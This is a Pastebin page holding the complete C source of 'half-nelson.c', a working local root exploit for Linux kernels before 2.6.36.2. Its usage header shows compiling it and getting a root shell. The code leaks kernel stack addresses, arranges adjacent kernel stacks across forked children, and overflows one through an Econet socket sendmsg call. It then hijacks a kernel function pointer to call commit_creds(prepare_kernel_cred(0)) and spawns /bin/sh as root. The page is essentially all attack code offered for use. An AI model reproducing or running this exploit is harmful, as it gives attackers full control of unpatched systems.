Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * half-nelson.c
- * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit
- * Usage:
- * $ gcc half-nelson.c -o half-nelson -lrt
- * $ ./half-nelson
- * # id
- * uid=0(root) gid=0(root)
- * Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).
- */
- #include <stdio.h>
- #include <stdlib.h>
- #include <stdint.h>
- #include <stddef.h>
- #include <string.h>
- #include <unistd.h>
- #include <errno.h>
- #include <fcntl.h>
- #include <limits.h>
- #include <syscall.h>
- #include <inttypes.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <sys/wait.h>
- #include <sys/ioctl.h>
- #include <sys/mman.h>
- #include <sys/ipc.h>
- #include <sys/sem.h>
- #include <sys/stat.h>
- #include <sys/mman.h>
- #include <sys/resource.h>
- #include <sys/syscall.h>
- #include <netinet/in.h>
- #include <net/if.h>
- #define IOVS 446
- #define NPROC 1024
- #define KSTACK_SIZE 8192
- #define KSTACK_UNINIT 0
- #define KSTACK_UPPER 1
- #define KSTACK_LOWER 2
- #define KSTACK_DIE 3
- #define KSTACK_PARENT 4
- #define KSTACK_CLOBBER 5
- #define LEAK_BASE 0xffff880000000000
- #define LEAK_TOP 0xffff8800c0000000
- #define LEAK_DEPTH 500
- #define LEAK_OFFSET 32
- #define NR_IPC 0x75
- #define NR_WAIT4 0x72
- #define SEMCTL 0x3
- #ifndef PF_ECONET
- #define PF_ECONET 19
- #endif
- #define STACK_OFFSET 6
- #define RESTART_OFFSET 40
- struct ec_addr {
- unsigned char station;
- unsigned char net;
- };
- struct sockaddr_ec {
- unsigned short sec_family;
- unsigned char port;
- unsigned char cb;
- unsigned char type;
- struct ec_addr addr;
- unsigned long cookie;
- };
- struct ipc64_perm {
- uint32_t key;
- uint32_t uid;
- uint32_t gid;
- uint32_t cuid;
- uint32_t cgid;
- uint32_t mode;
- uint16_t seq;
- uint16_t __pad2;
- unsigned long __unused1;
- unsigned long __unused2;
- };
- struct semid64_ds {
- struct ipc64_perm sem_perm;
- unsigned long sem_otime;
- unsigned long __unused1;
- unsigned long sem_ctime;
- unsigned long __unused;
- unsigned long sem_nsems;
- unsigned long __unused3;
- unsigned long __unused4;
- };
- union semun {
- int val;
- struct semid_ds *buf;
- unsigned short *array;
- struct seminfo *__buf;
- };
- struct region {
- unsigned long parent;
- unsigned long addrs[NPROC];
- };
- struct region *region;
- typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
- typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
- _commit_creds commit_creds;
- _prepare_kernel_cred prepare_kernel_cred;
- unsigned long ia32_sysret;
- void __attribute__((regparm(3)))
- kernel_code(void)
- {
- commit_creds(prepare_kernel_cred(0));
- }
- void
- payload_parent(void)
- {
- asm volatile (
- "mov $kernel_code, %rax\n"
- "call *%rax\n"
- );
- }
- void
- payload_child(void)
- {
- asm volatile (
- "movq $payload_parent, (%0)\n"
- "jmpq *%1\n"
- :
- : "r"(region->parent + RESTART_OFFSET), "r"(ia32_sysret)
- );
- }
- unsigned long
- get_kstack(void)
- {
- int i, size, offset;
- union semun *arg;
- struct semid_ds dummy;
- struct semid64_ds *leaked;
- char *stack_start, *stack_end;
- unsigned char *p;
- unsigned long kstack, *ptr;
- /* make sure our argument is 32-bit accessible */
- arg = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
- if (arg == MAP_FAILED) {
- printf("[-] failure mapping memory, aborting!\n");
- exit(1);
- }
- /* map a fake stack to use during syscall */
- stack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
- if (stack_start == MAP_FAILED) {
- printf("[-] failure mapping memory, aborting!\n");
- exit(1);
- }
- stack_end = stack_start + 4096;
- memset(arg, 0, sizeof(union semun));
- memset(&dummy, 0, sizeof(struct semid_ds));
- arg->buf = &dummy;
- /* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */
- asm volatile (
- "push %%rax\n"
- "push %%rbx\n"
- "push %%rcx\n"
- "push %%rdx\n"
- "push %%rsi\n"
- "push %%rdi\n"
- "movl %0, %%eax\n"
- "movl %1, %%ebx\n"
- "movl %2, %%ecx\n"
- "movl %3, %%edx\n"
- "movl %4, %%esi\n"
- "movq %5, %%rdi\n"
- "movq %%rsp, %%r8\n"
- "movq %6, %%rsp\n"
- "push %%r8\n"
- "int $0x80\n"
- "pop %%r8\n"
- "movq %%r8, %%rsp\n"
- "pop %%rdi\n"
- "pop %%rsi\n"
- "pop %%rdx\n"
- "pop %%rcx\n"
- "pop %%rbx\n"
- "pop %%rax\n"
- :
- : "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)
- : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8"
- );
- /* naively extract a pointer to the kstack from the kstack */
- p = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;
- kstack = *(unsigned long *) p;
- if (kstack < LEAK_BASE || kstack > LEAK_TOP) {
- printf("[-] failed to leak a suitable kstack address, try again!\n");
- exit(1);
- }
- if ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {
- printf("[-] failed to leak a suitable kstack address, try again!\n");
- exit(1);
- }
- kstack = kstack & ~0x1fff;
- return kstack;
- }
- unsigned long
- get_symbol(char *name)
- {
- FILE *f;
- unsigned long addr;
- char dummy, sym[512];
- int ret = 0;
- f = fopen("/proc/kallsyms", "r");
- if (!f) {
- return 0;
- }
- while (ret != EOF) {
- ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
- if (ret == 0) {
- fscanf(f, "%s\n", sym);
- continue;
- }
- if (!strcmp(name, sym)) {
- printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
- fclose(f);
- return addr;
- }
- }
- fclose(f);
- return 0;
- }
- int
- get_adjacent_kstacks(void)
- {
- int i, ret, shm, pid, type;
- /* create shared communication channel between parent and its children */
- shm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);
- if (shm < 0) {
- printf("[-] failed creating shared memory, aborting!\n");
- exit(1);
- }
- ret = ftruncate(shm, sizeof(struct region));
- if (ret != 0) {
- printf("[-] failed resizing shared memory, aborting!\n");
- exit(1);
- }
- region = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);
- memset(region, KSTACK_UNINIT, sizeof(struct region));
- /* parent kstack self-discovery */
- region->parent = get_kstack();
- printf("[+] found parent kstack at 0x%lx\n", region->parent);
- /* fork and discover children with adjacently-allocated kernel stacks */
- for (i = 0; i < NPROC; ++i) {
- pid = fork();
- if (pid > 0) {
- type = KSTACK_PARENT;
- continue;
- } else if (pid == 0) {
- /* children do kstack self-discovery */
- region->addrs[i] = get_kstack();
- /* children sleep until parent has found adjacent children */
- while (1) {
- sleep(1);
- if (region->addrs[i] == KSTACK_DIE) {
- /* parent doesn't need us :-( */
- exit(0);
- } else if (region->addrs[i] == KSTACK_UPPER) {
- /* we're the upper adjacent process */
- type = KSTACK_UPPER;
- break;
- } else if (region->addrs[i] == KSTACK_LOWER) {
- /* we're the lower adjacent process */
- type = KSTACK_LOWER;
- break;
- }
- }
- break;
- } else {
- printf("[-] fork failed, aborting!\n");
- exit(1);
- }
- }
- return type;
- }
- void
- do_parent(void)
- {
- int i, j, upper, lower;
- /* parent sleeps until we've discovered all the child kstacks */
- while (1) {
- sleep(1);
- for (i = 0; i < NPROC; ++i) {
- if (region->addrs[i] == KSTACK_UNINIT) {
- break;
- }
- }
- if (i == NPROC) {
- break;
- }
- }
- /* figure out if we have any adjacent child kstacks */
- for (i = 0; i < NPROC; ++i) {
- for (j = 0; j < NPROC; ++j) {
- if (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {
- break;
- }
- }
- if (j != NPROC) {
- break;
- }
- }
- if (i == NPROC && j == NPROC) {
- printf("[-] failed to find adjacent kstacks, try again!\n");
- exit(1);
- }
- upper = i;
- lower = j;
- printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\n", region->addrs[lower], region->addrs[upper]);
- /* signal to non-adjacent children to die */
- for (i = 0; i < NPROC; ++i) {
- if (i != upper && i != lower) {
- region->addrs[i] = KSTACK_DIE;
- }
- }
- /* signal adjacent children to continue on */
- region->addrs[upper] = KSTACK_UPPER;
- region->addrs[lower] = KSTACK_LOWER;
- /* parent sleeps until child has clobbered the fptr */
- while (1) {
- sleep(1);
- if (region->parent == KSTACK_CLOBBER) {
- break;
- }
- }
- printf("[+] escalating privileges...\n");
- /* trigger our clobbered fptr */
- syscall(__NR_restart_syscall);
- /* our privileges should be escalated now */
- if (getuid() != 0) {
- printf("[-] privilege escalation failed, aborting!\n");
- exit(1);
- }
- printf("[+] launching root shell!\n");
- execl("/bin/sh", "/bin/sh", NULL);
- }
- void
- do_child_upper(void)
- {
- int i, ret, eco_sock;
- struct sockaddr_ec eco_addr;
- struct msghdr eco_msg;
- struct iovec iovs[IOVS];
- struct ifreq ifr;
- char *target;
- /* calculate payload target, skip prologue */
- target = (char *) payload_child;
- target += 4;
- /* give lower child a chance to enter its wait4 call */
- sleep(1);
- /* write some zeros */
- for (i = 0; i < STACK_OFFSET; ++i) {
- iovs[i].iov_base = (void *) 0x0;
- iovs[i].iov_len = 0;
- }
- /* overwrite saved ia32_sysret address on stack */
- iovs[STACK_OFFSET].iov_base = (void *) target;
- iovs[STACK_OFFSET].iov_len = 0x0246;
- /* force abort via EFAULT */
- for (i = STACK_OFFSET + 1; i < IOVS; ++i) {
- iovs[i].iov_base = (void *) 0xffffffff00000000;
- iovs[i].iov_len = 0;
- }
- /* create econet socket */
- eco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);
- if (eco_sock < 0) {
- printf("[-] failed creating econet socket, aborting!\n");
- exit(1);
- }
- memset(&ifr, 0, sizeof(ifr));
- strcpy(ifr.ifr_name, "lo");
- /* trick econet into associated with the loopback */
- ret = ioctl(eco_sock, SIOCSIFADDR, &ifr);
- if (ret != 0) {
- printf("[-] failed setting interface address, aborting!\n");
- exit(1);
- }
- memset(&eco_addr, 0, sizeof(eco_addr));
- memset(&eco_msg, 0, sizeof(eco_msg));
- eco_msg.msg_name = &eco_addr;
- eco_msg.msg_namelen = sizeof(eco_addr);
- eco_msg.msg_flags = 0;
- eco_msg.msg_iov = &iovs[0];
- eco_msg.msg_iovlen = IOVS;
- printf("[+] upper child triggering stack overflow...\n");
- /* trigger the kstack overflow into lower child's kstack */
- ret = sendmsg(eco_sock, &eco_msg, 0);
- if (ret != -1 || errno != EFAULT) {
- printf("[-] sendmsg succeeded unexpectedly, aborting!\n");
- exit(1);
- }
- close(eco_sock);
- }
- void
- do_child_lower(void)
- {
- int pid;
- printf("[+] lower child spawning a helper...\n");
- /* fork off a helper to wait4 on */
- pid = fork();
- if (pid == 0) {
- printf("[+] helper going to sleep...\n");
- sleep(5);
- printf("[+] helper woke up\n");
- exit(1);
- }
- printf("[+] lower child calling compat_sys_wait4 on helper...\n");
- /* syscall(NR_WAIT4, pid, 0, 0, 0) */
- asm volatile (
- "push %%rax\n"
- "push %%rbx\n"
- "push %%rcx\n"
- "push %%rdx\n"
- "push %%rsi\n"
- "movl %0, %%eax\n"
- "movl %1, %%ebx\n"
- "movl %2, %%ecx\n"
- "movl %3, %%edx\n"
- "movl %4, %%esi\n"
- "int $0x80\n"
- "pop %%rsi\n"
- "pop %%rdx\n"
- "pop %%rcx\n"
- "pop %%rbx\n"
- "pop %%rax\n"
- :
- : "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)
- : "memory", "rax", "rbx", "rcx", "rdx", "rsi"
- );
- printf("[+] lower child returned from compat_sys_wait4\n");
- printf("[+] parent's restart_block has been clobbered\n");
- /* signal parent that our fptr should now be clobbered */
- region->parent = KSTACK_CLOBBER;
- }
- int
- main(int argc, char **argv)
- {
- int type;
- if (sizeof(unsigned long) != 8) {
- printf("[-] x86_64 only, sorry!\n");
- exit(1);
- }
- printf("[+] looking for symbols...\n");
- commit_creds = (_commit_creds) get_symbol("commit_creds");
- if (!commit_creds) {
- printf("[-] symbol table not available, aborting!\n");
- exit(1);
- }
- prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
- if (!prepare_kernel_cred) {
- printf("[-] symbol table not available, aborting!\n");
- exit(1);
- }
- ia32_sysret = get_symbol("ia32_sysret");
- if (!ia32_sysret) {
- printf("[-] symbol table not available, aborting!\n");
- exit(1);
- }
- printf("[+] spawning children to achieve adjacent kstacks...\n");
- type = get_adjacent_kstacks();
- if (type == KSTACK_PARENT) {
- do_parent();
- } else if (type == KSTACK_UPPER) {
- do_child_upper();
- } else if (type == KSTACK_LOWER) {
- do_child_lower();
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement